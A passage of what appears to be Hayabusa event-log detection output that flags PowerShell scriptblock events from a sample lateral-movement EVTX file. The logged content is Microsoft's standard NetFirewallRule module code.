$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 